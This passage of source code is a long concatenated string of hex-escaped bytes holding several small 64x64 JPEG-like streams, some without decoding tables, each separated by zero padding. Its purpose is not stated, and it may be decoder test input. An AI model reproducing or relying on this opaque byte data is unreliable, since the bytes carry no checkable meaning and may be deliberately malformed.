+"\xb2\x7f\x08\xfc\xbf\x9d\x33\xc5\x2e\xd7\xb3\x59\xe8\x70\x92\x0d" +"\xe3\xee\x98\x8f\xe1\x89\x79\x3f\x9f\xf4\xad\xf8\xd1\x63\x8d\x63" +"\x8d\x42\xa2\x80\x14\x0e\xc2\x8f\x86\x1e\xbf\x90\x7c\x55\x3d\x3f" +"\x31\xd4\x51\x45\x64\x6c\x14\x51\x45\x00\x21\xe4\x60\xd7\x3d\xe1" +"\xff\x00\xf8\x96\x6b\x57\xfa\x21\xe2\x3c\xfd\xa6\xdb\xfd\xc6\xea" +"\x07\xd0\xd7\x45\x5c\xf7\x8a\xd1\xac\xda\xd3\x5b\x84\x12\xf6\x52" +"\x62\x40\x3f\x8a\x36\xe0\x8f\xf3\xeb\x5a\xd3\xd6\xf0\xef\xf9\x99" +"\x55\xd2\xd3\xed\xf9\x75\x1b\xe1\xa0\x75\x2d\x4a\xff\x00\x5d\x71" +"\xf2\xca\xde\x45\xb6\x7b\x46\xbd\xff\x00\x13\xfc\x8d\x74\x75\x5e" +"\xc2\xd2\x3b\x0b\x08\x6d\x21\x1f\x24\x48\x14\x7b\xfb\xd5\x8a\x9a" +"\x92\xe6\x95\xd6\xc5\x53\x8f\x2c\x6c\xf7\x0a\x28\xa2\xa0\xb0\xa2" +"\x8a\x28\x00\xa8\xae\x60\x8e\xea\xd6\x5b\x79\x97\x74\x72\xa9\x46" +"\x1e\xc6\xa5\xa2\x80\xdc\x28\xa2\x8a\x00\x28\xa2\x8a\x00\x28\xa2" +"\x8a\x00\x28\xa2\x8a\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03" +"\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00" +"\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xaf\x7b\x67\x0d\xec\x1e\x54" +"\xc0\xf0\x77\x2b\xa9\xc3\x23\x76\x2a\x7b\x1a\xb1\x45\x34\xed\xb0" +"\x9a\xbe\x8c\x82\xd5\x66\x8a\xd9\x12\xee\x64\x96\x50\x71\xe6\x05" +"\xdb\xbb\x9e\x38\xf5\xa9\xea\x1b\xbb\x58\x6f\x2d\xda\x0b\x84\xdc" +"\x8d\xf8\x10\x7b\x10\x7b\x11\xeb\x51\xd8\x45\x75\x0c\x2d\x15\xdc" +"\xcb\x3e\xd6\xc4\x72\x63\x0c\xcb\xdb\x77\x6c\xfb\x8e\xb4\x6e\xae" +"\x2d\x9d\x8b\x54\x51\x45\x22\x8a\xcf\x6c\x44\xb2\x4a\x25\x76\x0f" +"\x83\xb0\xe3\x0b\x8f\x4f\xad\x57\x86\x58\xe7\x85\x65\x89\xb7\x23" +"\x8c\x83\x8c\x7f\x3a\xd1\xa8\x2e\xa2\x92\x44\x5f\x21\xd1\x1c\x30" +"\x24\xb2\xe4\x11\xdc\x7e\x54\x6e\x17\xb1\x3d\x14\xd8\xdd\x64\x8d" +"\x64\x8d\x83\x23\x00\x54\x8e\xe2\x9d\x40\x05\x32\x68\x92\x78\x5e" +"\x29\x54\x32\x3a\x95\x65\x3d\xc1\xa7\xd1\x40\x14\xac\x21\xba\xb5" 
+"\x67\x82\x69\x3c\xe8\x17\x06\x29\x18\xe5\xf1\xfd\xd6\xf5\xc7\xaf" +"\xf9\x37\x68\xac\xfb\x38\x2e\xac\xae\x7e\xce\x18\xcf\x64\xc0\x94" +"\x67\x6c\xbc\x47\xfb\xa7\x3f\x79\x7d\x0f\x51\xd2\xab\xe2\xd4\x9f" +"\x87\x43\x42\x8a\x28\xa9\x28\xc0\xf0\x8c\xf2\x2d\x9c\xda\x55\xcb" +"\x66\xe3\x4f\x90\xc4\x7d\xd3\xf8\x4f\xe5\xfc\xab\x7e\xb9\xcd\x5b" +"\xfe\x25\x3e\x28\xb3\xd5\x07\x10\x5d\x8f\xb2\xdc\x7a\x03\xfc\x2d" +"\xfe\x7b\x0a\xe8\xeb\x5a\xba\xbe\x65\xd4\xca\x96\x8b\x95\xf4\xfe" +"\x90\x51\x45\x15\x91\xa8\x51\x45\x14\x01\x9f\xb6\xf2\xd7\x50\xdc" +"\x9b\xee\x6d\x27\x6f\x99\x4b\x0d\xd0\x1f\x51\x9e\xab\xed\xd4\x76" +"\xe3\x81\xa1\x45\x67\xde\x35\xe5\xad\xd0\xb9\x84\x3d\xcd\xbb\x60" +"\x49\x00\x03\x72\x7f\xb4\xbe\xbe\xe3\xf2\xf4\x35\xf1\x13\xf0\x8b" +"\xae\x69\xcb\xaa\x68\xf7\x16\x67\x1b\x9d\x72\x84\xf6\x61\xc8\x3f" +"\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00" +"\x3f\x00\xf4\x72\x70\x33\xd6\xb2\x8e\xaf\x20\xcf\xfa\x36\x78\xec" +"\xc7\xd0\x9c\x1e\x3a\xf1\x5a\xb4\x54\x94\x53\xb3\xbd\x6b\x99\x8a" +"\x18\x8a\x8c\x67\xbe\x47\xd6\xaf\x47\xfe\xb5\x3a\xf5\xed\x50\x5c" +"\x5c\x25\xb8\x05\xc1\x3b\xba\x60\x54\xf0\x90\xd2\x21\x5c\x91\xd7" +"\x83\x4e\xc2\xbf\x42\x97\x88\xb3\x8b\x7e\xb8\xc9\xfa\x57\x31\x2e" +"\xa0\x52\xe0\xc4\x23\x1d\x48\xc9\x3d\x3a\x72\x7d\xb9\xae\xc3\x56" +"\xb1\x7b\xc8\xd0\xc4\x54\x3a\x12\x70\xdd\xeb\x27\xfb\x1a\xe5\x5c" +"\x9d\xb0\x06\x3c\x93\xbb\x9c\x7e\x55\xe4\xe2\xf0\xd5\x2a\x55\xe6" +"\x51\xba\xb1\xdb\x42\xb4\x63\x0b\x37\x63\x14\x6a\x2c\x53\x22\xdd" +"\xc9\x1f\x79\x47\x50\x38\xe7\xf5\xad\x9d\x18\x9f\xed\x48\x0b\x00" +"\x18\xab\x71\xf8\x53\x86\x93\x76\x7a\x79\x24\xf4\xfb\xfd\xea\xdd" +"\x86\x93\x3c\x57\x7e\x6d\xc3\x05\x45\x04\x00\x8c\x72\x73\xef\xda" +"\xb3\xc3\xe1\x6a\xc2\xac\x64\xe3\x64\xbc\xcb\xab\x5a\x12\x83\x5c" +"\xd7\x2e\x53\x26\x99\x21\x4d\xd2\x36\x07\xf3\xa2\x69\x52\x14\xdd" +"\x21\xc0\xaa\x6d\x0c\xd3\xdd\xa9\x3b\x9e\x36\x07\x1b\x4f\x04\x76" +"\xc5\x7b\x71\x57\xdc\xf3\xa5\x2b\x6c\x49\x08\x92\xe4\xbb\x31\x0c" 
+"\x87\x80\xa0\x75\xc1\xeb\xcd\x6a\x43\x08\x8c\x76\x2d\xeb\x8e\xde" +"\x94\x43\x08\x8c\x64\xf2\xdd\xb8\xe9\xed\x4e\x96\x54\x86\x26\x92" +"\x43\xb5\x57\xa9\xa7\xb8\xb6\x12\x69\x3c\xa8\x8b\x85\x2e\x47\x45" +"\x1d\x4d\x67\x6a\x6b\xbc\xc7\x6c\x80\x89\xae\xc8\x57\x39\xce\xd4" +"\x1c\xb7\xf8\x7e\x35\xa0\x88\x7c\xd6\x95\x99\x8e\xe0\x00\x53\xc6" +"\xd1\xfe\x35\x4a\xc3\xfd\x2a\xfe\xe2\xf8\xf2\x80\xf9\x31\x7d\x01" +"\xf9\x8f\xe7\xfc\xaa\xa3\xa6\xa4\x4b\x5d\x06\xf9\x49\x6b\xac\xaa" +"\x95\x1e\x4d\xc8\x05\x7f\xd9\x91\x47\xf5\x1f\xca\xaf\x46\xee\xb9" +"\x59\xca\x02\x5b\x0a\x41\xfb\xd5\x0e\xab\x6e\xf3\xd9\x37\x93\xfe" +"\xba\x32\x24\x8f\xfd\xe1\xfe\x71\x4f\x81\xe1\xd4\x2c\x63\x97\x1b" +"\x92\x45\x0c\x39\xe9\x43\xd5\x5c\x12\xb3\x68\xca\x82\x37\xba\x90" +"\xb4\xff\x00\x30\x56\x1b\x00\x6e\xa4\x7a\x74\xfc\xeb\x5e\xde\x05" +"\x89\x17\x80\x30\x30\x06\x3e\xe8\xc7\x4a\x2d\xe1\xda\xa1\x99\x70" +"\x4f\x3b\x4e\x3e\x5a\x9e\xa5\xbb\x94\x95\x84\x24\x28\x25\x88\x00" +"\x75\x26\xa3\x41\x23\xca\xcc\xfb\x7c\xae\x36\x01\xce\x7d\xe9\xac" +"\x3e\xd0\xef\x14\x91\x1f\x29\x71\xc9\xfe\x23\xfe\x15\x35\x03\xdc" +"\xa7\xaa\xdc\x3c\x16\x44\x43\xfe\xba\x52\x23\x8f\xfd\xe3\xdf\xf0" +"\xeb\x53\xda\x5b\xa5\xad\xac\x56\xf1\x8f\x96\x35\x0a\x2a\x9a\xff" +"\x00\xa6\x6b\x65\xba\xc5\x66\x36\x8f\x79\x0f\x5f\xc8\x7f\x3a\xd2" +"\xa6\xf4\x56\x26\x3a\xb6\xc2\xb3\x6c\x3f\xd1\x35\x0b\x8b\x13\xc2" +"\x31\xf3\xa2\xfa\x13\xf3\x0f\xcf\xf9\xd6\x95\x67\x6b\x1f\xb8\x48" +"\xb5\x01\xff\x00\x2e\xad\xb9\xf1\xfd\xc3\xf7\xbf\xc7\xf0\xa2\x3a" +"\xe8\x13\xd3\x5e\xc6\x8d\x41\x21\x5b\x82\xf0\x2b\xb2\xed\xc6\xe6" +"\x5f\xe5\x9a\x7c\xe2\x52\x98\x84\x80\xc4\xe3\x71\xec\x3d\x69\xe0" +"\x60\x52\x2b\x70\x00\x00\x00\xe8\x2a\x0b\xeb\xa5\xb2\xb2\x96\xe5" +"\xd4\xb0\x8d\x72\x14\x75\x63\xd8\x0a\x9f\x23\x19\xcd\x57\xbb\xb6" +"\x17\x2f\x01\x67\xc2\x45\x20\x72\xbf\xde\x23\xa7\xeb\x42\xb5\xf5" +"\x07\x7b\x68\x37\x4b\xb6\x7b\x5b\x14\x49\x88\x69\xdb\x2f\x2b\x0e" +"\xee\x79\x35\x6e\x8a\x28\x6e\xee\xe0\x95\x95\x82\x9a\xea\xae\x85" 
+"\x1c\x06\x56\x18\x20\xf7\x14\xea\x29\x0c\xff\xd9\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00" +"\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00" +"\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\x86\x00\x48\xf8" +"\x00\x7c\xc7\xa5\x45\x24\xa5\x0f\xfa\xb2\x47\xf7\xb2\x31\x4e\x78" +"\x40\x99\xf2\x5b\xef\x67\x82\x6a\x39\x6d\x96\x48\x99\x37\x30\x04" +"\x63\xae\x6a\x1d\xcb\x8a\x5d\xc9\x77\xa7\xf7\x97\xf3\xa3\x72\xf3" +"\xc8\xe3\xaf\x35\x57\xfb\x3a\x22\x49\x24\x9c\xfd\x3f\xcf\x7a\xa8" +"\xe6\xd6\x15\xb8\x81\x0c\xcc\xcc\x70\x58\x44\x5c\x03\xf8\x0e\x6a" +"\x57\x3b\xe8\x5b\xf6\x6b\xed\x1a\xbb\xd7\xfb\xc3\xf3\xa0\xba\x80" +"\x49\x61\x81\xd7\x9a\xcc\x82\x1b\x57\x84\x3b\x4e\x41\x39\x07\x2b" +"\xb3\x9c\xfa\x11\xc7\x5e\x95\x32\x47\x6a\xa4\xe2\x71\xb9\x97\x69" +"\x24\x8e\x7d\x69\x73\x4b\x66\x8a\xe4\x8e\xe9\xdf\xe4\x5c\x47\x59" +"\x14\x32\x30\x20\xf7\x15\x0d\xf7\xfa\xb5\xe4\xf5\xf4\xa5\xb4\x58" +"\x52\x2d\x90\x38\x60\x0e\x4e\x29\xb7\xdf\x71\x7a\xf5\xed\x57\x17" +"\x73\x29\xab\x3b\x23\x51\xd1\x64\x00\x30\xce\x39\x15\x55\xd1\xa3" +"\xe1\xb9\x1f\xde\xe8\x0d\x58\x57\x90\x4a\xeb\x22\x80\x9c\x6d\x60" +"\x9d\x3b\x46\x92\xea\x4d\x22\xd9\xaf\xe2\x68\xae\x76\x62\x45\x6e" +"\xb9\x1c\x67\xf1\xc6\x7f\x1a\xb9\xd2\x80\xc0\xf4\x20\xf7\xe2\x8e" +"\x6f\x77\x94\x39\x7d\xee\x61\x68\xa2\x8a\x92\x82\x8a\x28\xa0\x02" +"\x8a\x28\xa0\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22" +"\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11" +"\x03\x11\x00\x3f\x00\xf4\x7a\x29\x5b\x0b\x21\x8c\x91\xb8\x0c\xe3" +"\x3c\xe3\xd6\x92\xa4\xa0\xa2\x8a\x28\x18\x51\x45\x14\x00\x56\x6c" +"\xcf\x1b\xdc\xcb\xe5\xe3\x2a\xdb\x5f\x8c\x7c\xd8\x1f\xfd\x6a\xd2" +"\xac\xe9\xe4\x12\x5c\xca\x02\xb0\xd8\xdb\x4e\xe1\x8c\xf0\x0e\x47" 
+"\xa8\xe6\x9a\x25\x9b\x6f\x04\x4f\x27\x98\xd1\xaf\x99\xb7\x6e\xfc" +"\x7c\xc0\x7a\x67\xd2\xaa\x22\xcd\x86\xf3\xa2\x08\x43\x10\x30\xdb" +"\xb2\x33\xc1\xfc\x47\x6a\xbf\x51\xdc\x42\x97\x10\x34\x32\xee\xd8" +"\xc3\x07\x6b\x15\x3f\x98\xe4\x53\xdc\x5b\x6c\x55\xa2\x9d\x30\xf2" +"\xa5\x8d\x02\x48\xc1\xc1\xf9\x82\xe4\x2e\x07\x73\xdb\x34\xda\x92" +"\x93\xb8\x51\x45\x14\x0c\x2b\x3a\xe1\xd9\xee\x64\x0d\x1b\x26\xd6" +"\xda\x33\xfc\x43\x03\x91\xfe\x7b\x56\x8d\x67\x4e\xd2\x1b\x99\x7c" +"\xc4\x0a\x03\x61\x08\x39\xdc\x30\x39\xf6\xe7\x3f\x95\x34\x4b\x37" +"\xe8\xa2\x8a\x62\x0a\xa8\xf0\x18\xbc\xe9\x5a\x66\x64\xce\xe0\xa4" +"\x0f\x90\x63\x90\x30\x3f\x1a\xb7\x45\x00\x67\xc7\x22\x4b\x1a\xc9" +"\x1b\x07\x47\x01\x95\x87\x42\x3d\x69\xd5\x35\xcc\x52\x36\xc3\x07" +"\x96\x30\xc3\x7e\xe0\x79\x5e\xf8\xc7\x7a\x86\x93\x29\x30\xac\xe9" +"\xfc\xdf\xb4\xcb\xe6\xec\xc6\xef\x93\x6f\xf7\x70\x3a\xfb\xe7\x35" +"\xa3\x59\xd7\x02\x41\x73\x27\x98\xe1\x81\x39\x5c\x0c\x61\x70\x38" +"\xf7\xef\x42\x13\x34\xaf\xde\xf6\x06\x4b\x8b\x55\xf3\xe3\x40\x7c" +"\xcb\x70\x06\xe6\x1e\xaa\x7d\x47\xa7\x7a\xb5\x0c\x8b\x34\x29\x2a" +"\x6e\xda\xe0\x30\xdc\x08\x3f\x91\xe9\x4f\xa2\xaa\xfa\x13\x6d\x42" +"\x8a\x28\xa4\x32\x39\xd0\xc9\x04\x91\xab\xb4\x65\x94\x80\xeb\xd5" +"\x78\xea\x3d\xea\xa8\xe0\x01\x56\xa7\x8d\x65\xb7\x92\x26\x2c\xaa" +"\xea\x54\x95\x38\x20\x11\xd8\xf6\xaa\xa0\x60\x01\xe8\x31\x49\x8d" +"\x6e\x15\x9d\x3a\x32\x5c\xca\x5a\x42\xfb\x9b\x70\x07\xf8\x46\x07" +"\x1f\xe7\xd6\xb4\x6b\x3a\x78\xf6\x5c\xc8\x77\x33\x6f\x3b\xbe\x63" +"\x9c\x71\xd0\x7b\x71\x42\x06\x00\xff\xd9\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00" +"\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03" +"\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf5\x5a\xa3\xe6\x19\x59\xd8" +"\xa3\xa6\x1c\xae\x18\x60\x9c\x1c\x67\xe8\x7b\x55\xea\xa3\xb9\xdd" +"\x9c\xc9\x19\x8c\x87\x20\x0c\xe7\x20\x1e\x0f\xe2\x39\xa1\xec\x0b" 
+"\x70\xa2\x8a\x2a\x4b\x0a\xb1\x6a\xee\xf0\xe5\xe3\x31\x90\xc5\x40" +"\x27\x39\x00\xf0\x7f\x1e\xb5\x5e\xa7\xb3\x32\x98\x4f\x9c\x8a\x87" +"\x73\x05\x0a\x73\x95\xcf\x07\xf2\xa6\x89\x61\x35\xd4\x10\x4f\x14" +"\x32\xb9\x57\x94\x31\x41\xb4\x9c\xed\x19\x3c\xf6\xe2\xa0\x86\xef" +"\x4f\xbf\x9e\xd9\xe2\x22\x59\x3c\xaf\xb4\x42\x4a\x11\x84\x3c\x67" +"\x91\xc7\xa6\x3a\xd5\xea\x29\x88\x2a\x80\x32\x96\x93\xce\x45\x56" +"\xde\xc0\x6d\x39\xca\xe7\x83\xf5\xc5\x5f\xaa\x38\x94\x33\xf9\xcc" +"\xa5\xb7\xb6\x36\x8c\x0d\xb9\xe3\xf1\xc5\x0f\x60\x5b\x85\x14\x51" +"\x52\x58\x52\x05\xc4\xfe\x70\x77\xdd\xb7\x66\x37\x1d\xb8\xfa\x74" +"\xcf\xbd\x2d\x14\x0a\xc2\x28\x2b\x33\xca\x1d\xf7\x3e\x01\x05\x89" +"\x1c\x7a\x0e\x82\x96\x3c\xc6\xce\xca\xee\x4b\x9d\xc7\x73\x13\xf9" +"\x7a\x51\x45\x3b\xb0\xb2\x2f\x56\x71\x71\x1c\xed\x0c\xd3\xa3\xca" +"\xcc\xce\xab\xc0\x3b\x73\xc7\x1e\xdc\x0c\xd5\xc5\x9d\x19\xb6\x8c" +"\xfd\x7b\x54\x57\x11\xc1\x71\x2e\xc9\x33\xb9\x17\x3c\x7a\x53\x24" +"\x80\x4d\x11\x98\xc4\x24\x43\x22\x8d\xc5\x33\xc8\x1e\xb8\xa1\x66" +"\x89\xe4\x78\xd2\x44\x67\x4f\xbc\xa0\xf2\xbf\x5a\x6a\xdb\xd9\x90" +"\x0e\x64\x1b\x94\xb0\xc9\x1c\x81\x4e\x36\x96\x80\xe0\x09\x59\x89" +"\xe8\x3a\x9e\x3f\xfa\xf4\xb4\x1d\xd8\x24\xd1\x48\x58\x47\x22\x39" +"\x43\xb5\xb6\x9c\xe0\xfa\x1a\x23\x9a\x29\x50\xb4\x52\x23\xa8\x24" +"\x12\xa7\x23\x23\xad\x48\xba\x75\xb9\x50\x47\x98\x33\xcf\x27\x14" +"\xbf\xd9\xb6\xe3\xa6\xff\x00\xce\x8b\x05\xd9\x12\xcf\x0b\xc3\xe7" +"\x24\xa8\xd1\x63\x3b\xc3\x71\x8f\xad\x21\xb8\x81\x60\xf3\xda\x68" +"\xc4\x38\xdd\xe6\x16\xf9\x71\xeb\x9a\x94\x69\x96\xe0\x60\x6e\xc7" +"\xa6\x69\x7f\xb3\x6d\xf1\x8f\x9f\x1f\x5a\x76\x42\xbb\x27\x48\x02" +"\x7a\xfb\x7d\x6a\x42\x03\x0c\x10\x08\xf7\xab\x68\x84\xca\x55\x8d" +"\x36\xaa\xba\x5d\xc4\xb1\xcb\x6d\x2c\x9b\xe4\x24\x34\x60\x1e\xbf" +"\x8d\x6e\x49\x11\x8f\x91\x92\xbe\xbd\xea\xa3\x58\xda\x33\x97\x68" +"\x10\xb1\x39\x24\x8e\xb4\xe2\xd2\xf8\x85\x25\x26\xbd\xd2\x95\xba" +"\xcb\x24\x1e\x62\xdb\x23\xef\x76\x7c\x39\x04\x80\x4f\x4e\x2a\xc4" 
+"\x91\xc9\xbb\x8b\x48\x98\x63\xfa\x55\xa8\xa2\x8e\x14\xd9\x12\x2a" +"\x2e\x73\x80\x29\xf5\x94\xa2\xa4\xdb\x36\x84\xdc\x62\x91\x51\x3e" +"\xd0\x88\xfb\x60\x44\x38\xe3\x6f\x73\x4e\xbd\xcf\x94\x99\x1c\xe7" +"\xd6\xac\xd5\x6b\xec\x6c\x4c\xe3\xaf\x7e\xbf\x85\x38\xc6\xc2\x9c" +"\xae\x6a\x49\x1a\x4b\x1b\x47\x22\x86\x46\x18\x20\xf7\xa6\x29\x78" +"\xe5\x58\xf6\x13\x1e\xde\x1f\x39\xc1\xf7\xa9\x41\x04\x02\x0e\x41" +"\xef\x41\x01\x81\x04\x64\x1e\xb5\xa1\x95\x85\xaa\xd3\x42\x57\x2d" +"\x18\x27\xa9\x2a\x3a\x93\x4e\x5f\xf4\x61\x1c\x6a\xae\xf1\x93\x8c" +"\xe7\x3b\x7d\x3f\x0a\x9e\x90\x22\x8f\x72\x3d\x28\xab\x12\xc2\x1b" +"\xe6\x4e\x18\x67\x8e\x99\xfa\xd5\x73\xc1\x20\xf5\x1d\x69\x58\xb4" +"\xc2\xab\x5f\x1f\x91\x46\x47\x5f\x4a\xb3\x55\xaf\xbe\xe2\xf2\x7a" +"\xfa\x50\x81\x93\x68\xc4\xc5\x0c\x96\x2e\x49\x6b\x46\xf2\xc1\x6e" +"\xa5\x3f\x84\xfe\x55\xa3\x55\xfe\xcc\x82\xff\x00\xed\x41\x88\x72" +"\x9b\x18\x76\x61\x9c\x8a\xb1\x57\x27\x77\x73\x38\xab\x2b\x05\x57" +"\x38\xb4\x46\x6f\xde\x3c\x65\xb2\x47\x5d\x9f\xd7\x15\x62\x8a\x91" +"\xb4\x14\xc9\x23\x12\x0e\x7a\x8e\x86\x91\x63\x2b\x33\x38\x90\x95" +"\x6f\xe1\x3d\x8f\xb5\x49\x40\xca\x4c\xac\x8d\xb5\x87\x4e\xfd\x8d" +"\x55\xbe\xfb\x8b\xd7\xaf\x6e\x95\x7a\xe4\x7e\xf4\x1c\x76\xeb\x9a" +"\xa3\x7c\x3f\x76\xa7\x1d\x0f\x5c\xd2\xea\x3e\x80\xff\xd9\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8\xff\xc0\x00\x11" +"\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xff" +"\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f\x00\xf4\xeb\xa3" +"\xf7\x06\x4f\x7e\x31\x50\x54\xd7\x5f\xc1\xd7\xbf\x4e\x95\x0d\x26" +"\x52\x24\x80\xfe\xf8\x0c\x9e\x87\xb7\x15\x23\x24\x8c\xfc\xb2\x18" +"\xf2\x0e\xd2\xbe\x95\x5f\x1d\x3d\xb9\xa0\x0c\x63\x19\xe0\xe6\x8b" +"\x89\xa2\xf5\x41\x77\x13\xcd\x0e\xc8\xa5\x31\x9d\xc0\x96\x07\x07" +"\x1e\x09\xdb\xd4\x0a\x6f\xd9\x97\xcc\x2f\xb9\xb7\x12\x49\xe7\xd7" +"\xfc\xfe\x95\x3d\x14\x01\x5d\xad\x23\x64\x0b\xc8\x01\x76\x8c\x7f" 
+"\x3a\x5f\xb3\xe1\xb7\x2b\x95\x6f\x5c\x76\xc0\xe3\xf4\xa9\xe8\xa0" +"\x04\x51\x85\x00\x92\x7d\xcf\x7a\x5a\x28\xa0\x02\x8a\x28\xa0\x00" +"\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd8" +"\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01\x22\x00\x02\x11\x01" +"\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02\x11\x03\x11\x00\x3f" +"\x00\xf5\x5a\x28\xa2\x80\x0a\xcb\xbf\x9a\xec\xeb\xba\x7d\xa5\xbd" +"\xc0\x86\x19\x23\x96\x59\x7e\x40\xcc\xdb\x4a\x60\x0c\xf4\x1f\x31" +"\xcd\x6a\x53\x0c\x51\xb4\xab\x2b\x22\x99\x10\x10\xad\x8e\x40\x38" +"\xc8\xfd\x07\xe5\x40\x1c\xa6\x87\x73\x7f\x61\xa3\xe8\xf2\xbc\xeb" +"\x3c\x33\xc2\xca\x2d\x96\x30\x36\x85\x8d\x9d\x76\x9e\xa4\xfc\xb8" +"\x39\xe3\x9e\xd5\x72\xd6\xfe\xf9\x06\x97\x77\x35\xf4\x77\x51\xea" +"\x4c\x14\xc0\x91\x80\x13\x2a\x5b\x28\x47\x24\x0c\x73\x9c\xf1\xcf" +"\x1d\x2b\x71\x2d\x6d\xd1\x61\x54\x82\x35\x58\x3f\xd5\x00\xa3\xe4" +"\xe3\x1c\x7a\x70\x48\xa8\x6d\xf4\xbd\x3e\xd6\xe9\xee\x6d\xec\xa0" +"\x8a\x67\xce\xe7\x44\x00\x9c\xf5\xfc\xe8\x03\x0e\xcf\x54\xd4\xe1" +"\xb1\xd3\xaf\xee\xe7\x5b\xbf\xb6\xc2\xec\x6d\xe3\x8c\x28\x04\x46" +"\x5c\x6d\x3d\x73\xf2\xe3\x9f\x5e\xd4\xba\x5e\xa7\xab\xb4\xb6\x53" +"\x5c\xa3\xcb\x15\xda\x96\x28\x4c\x2a\xbf\x74\xb0\xf2\xb6\xb9\x63" +"\xe9\xce\x78\xe7\x8a\xe8\x52\xd6\xdd\x16\x15\x48\x63\x51\x07\xfa" +"\xa0\x14\x7c\x9c\x63\x8f\x4e\x0e\x2a\x2b\x6d\x32\xc2\xd2\xe1\xa7" +"\xb6\xb3\x82\x29\x5f\xab\xa2\x00\x7d\xe8\x01\x91\x66\x20\xc1\x5d" +"\xce\xe6\x2c\x77\x31\x6e\x4f\xd7\xb7\xb5\x24\x6a\x63\x83\xca\x59" +"\x24\x2b\xcf\x2c\xe4\xb7\x3e\xe7\x9a\x5a\x29\x5d\x95\x64\x37\x6f" +"\xfa\x37\xd9\xf7\xc9\xb3\x6e\xdc\xef\x3b\xb1\xfe\xf7\x5c\xfb\xd1" +"\x2a\x79\xb6\xfe\x4b\xbc\x9b\x78\xe5\x5c\x86\xe3\xdc\x73\x4e\xa2" +"\x8b\xb0\xb2\x09\x77\x4a\x14\x33\xb8\xda\xc1\x86\xd6\x2b\xc8\xfa" +"\x76\xf6\xa2\x4c\xc8\xe8\xcc\xee\x0a\x1d\xc3\x6b\x10\x3f\x11\xde" +"\x8a\x28\xb8\x59\x03\x02\xd3\x24\xa5\xdf\x72\x64\x00\x18\x81\xcf" 
+"\xa8\xe8\x68\xe7\xcf\xf3\xb7\xc9\xbb\x6e\xdc\x6f\x3b\x71\xf4\xe9" +"\x9f\x7a\x28\xa2\xe1\x64\x32\x49\xa2\x8a\x31\x24\x92\xa2\x21\xc7" +"\xcc\xc7\x03\x9e\x94\x4b\x34\x50\xed\xf3\x64\x44\xde\xc1\x57\x71" +"\xc6\x4f\xa5\x4b\xfd\x9b\x6f\xfe\xdf\xe7\x47\xf6\x6d\xb9\xeb\xbf" +"\xf3\xa7\x64\x4d\xd9\x13\x4d\x12\x3a\x23\xc8\x8a\xef\x9d\xaa\x4f" +"\x2d\xf4\xa0\xcd\x10\x99\x62\x32\x20\x91\x81\x21\x09\xe4\x81\xdf" +"\x15\x2f\xf6\x6d\xbf\xfb\x7f\x9d\x1f\xd9\xb6\xff\x00\xed\xfe\x74" +"\xac\x3b\xb2\x21\x2c\x46\x53\x17\x98\x9e\x60\x1b\x8a\x67\x9c\x7a" +"\xe2\x85\x9a\x26\x95\xa3\x59\x14\xba\x63\x72\x83\xc8\xcf\x4c\xd4" +"\x9f\xd9\x96\xf9\xcf\xcd\x9f\x5c\xd2\xff\x00\x66\xdb\xff\x00\xb7" +"\xf9\xd1\x60\xbb\x22\x49\xa2\x91\x9d\x63\x91\x1c\xa1\xda\xc1\x4e" +"\x76\x9f\x43\x44\x73\x45\x28\x63\x1c\x88\xe1\x49\x52\x54\xe7\x04" +"\x75\x15\x2f\xf6\x6d\xbf\xfb\x7f\x9d\x1f\xd9\xb6\xe3\xa6\xff\x00" +"\xce\x9d\x82\xec\xb9\x45\x14\x50\x20\xa2\x8a\x28\x00\xa2\x8a\x28" +"\x00\xa2\x8a\x28\x00\xff\xd9\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\xff\xd8\xff\xc0\x00\x11\x08\x00\x40\x00\x40\x03\x01" +"\x22\x00\x02\x11\x01\x03\x11\x01\xff\xda\x00\x0c\x03\x01\x00\x02" +"\x11\x03\x11\x00\x3f\x00\xee\xa6\xbe\xbc\xbd\xd4\x2d\xec\x61\x32" +"\xe9\x66\x48\xde\x56\x69\x51\x1a\x46\xda\x54\x6d\x5e\x4a\xff\x00" +"\x16\x4f\x5e\xd5\x85\x3e\xad\x7a\x1e\x4b\xa9\x2e\x20\x9a\x7b\x24" 